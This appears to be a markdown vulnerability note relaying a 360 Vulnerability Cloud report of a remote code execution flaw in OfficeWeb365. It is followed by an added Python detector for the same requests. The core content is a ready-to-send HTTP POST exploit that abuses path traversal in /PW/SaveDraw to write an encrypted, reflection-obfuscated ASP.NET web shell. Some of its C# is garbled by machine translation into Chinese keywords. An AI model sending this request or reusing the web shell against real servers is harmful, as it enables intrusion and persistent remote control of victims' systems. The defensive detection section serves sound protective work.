2023Hvv/OfficeWeb365 远程代码执行漏洞.md
2023-08-15 14:36:32 +08:00


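[Message details] 360 Vulnerability Cloud (360漏洞云) detected circulating reports of an "OfficeWeb365 remote code execution vulnerability". After review by Vulnerability Cloud, it is confirmed to be a [real] vulnerability. Affected versions: [unknown]. A standardized PoC for this vulnerability has been uploaded to the Vulnerability Cloud intelligence platform under platform ID 360LDYLD-2023-00002453. Intelligence subscribers can log in to the platform ( https://loudongyun.360.cn/bug/list ) to view the vulnerability details.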
# Details
```
POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36
Content-Length: 2265
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
<%@Import 命名空间="System.Reflection" %>
<脚本运行=“服务器”>
私有字节[]解密(字节[]数据)
{
字符串键=“e45e329feb5d925b”
数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
aes.Mode = System.Security.Cryptography.CipherMode.ECB;
aes.Key = Encoding.UTF8.GetBytes(key);
aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
}
私有字节[]加密(字节[]数据)
{
字符串键=“e45e329feb5d925b”
System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
aes.Mode = System.Security.Cryptography.CipherMode.ECB;
aes.Key = Encoding.UTF8.GetBytes(key);
aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
}
</脚本>
<%
//byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
byte[] c=Request.BinaryRead(Request.ContentLength);
string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
类型程序集=Type.GetType(asname);
MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
object pay=create.Invoke(obj,new object[] { name });
pay.Equals(this);%>>---
```
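
A defensive check for the request shape shown above, as an added example that is not part of the original file: it flags POSTs to `/PW/SaveDraw` whose `path` parameter traverses directories, whose `idx` parameter names a server-executable file, or whose body carries ASP.NET code markers. The function names, the extension list and the sample requests are constructed assumptions.

```python
from urllib.parse import parse_qsl, unquote, urlsplit

# Extensions IIS/ASP.NET executes or treats as configuration (assumed list).
EXEC_EXT = (".aspx", ".ashx", ".asmx", ".asp", ".cshtml", ".config")

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(method, target, body=b""):
    """Return sorted reasons a request looks like a SaveDraw file-write attempt."""
    parts = urlsplit(target)
    endpoint = fully_unquote(parts.path).lower().rstrip("/")
    if method.upper() != "POST" or endpoint != "/pw/savedraw":
        return []
    reasons = set()
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(raw).replace("\\", "/")
        if key.lower() == "path" and ".." in value.split("/"):
            reasons.add("path-traversal")
        # Windows ignores trailing dots and spaces in file names.
        if key.lower() == "idx" and value.lower().rstrip(". ").endswith(EXEC_EXT):
            reasons.add("executable-extension")
    # An image data URI has no reason to contain ASP.NET code markers.
    if b"<%" in body or b"runat=" in body.lower():
        reasons.add("server-code-in-body")
    return sorted(reasons)

# Constructed sample requests (method, request target, start of body).
SAMPLES = [
    ("POST", "/PW/SaveDraw?path=../../Content/img&idx=1.aspx",
     b'data:image/png;base64,AAAA<%@ Page Language="C#" %>'),
    ("POST", "/pw/savedraw?PATH=%252e%252e%252fContent&IDX=2.AsHx.", b""),
    ("POST", "/PW/SaveDraw?path=draw&idx=3.png", b"data:image/png;base64,iVBORw0KGgo="),
    ("GET", "/Content/img/3.png", b""),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, target, "->", inspect_request(method, target, body) or "clean")
```

The same three conditions can be expressed as WAF or reverse-proxy rules; the body check needs request-body inspection enabled, since web server access logs record only the request line.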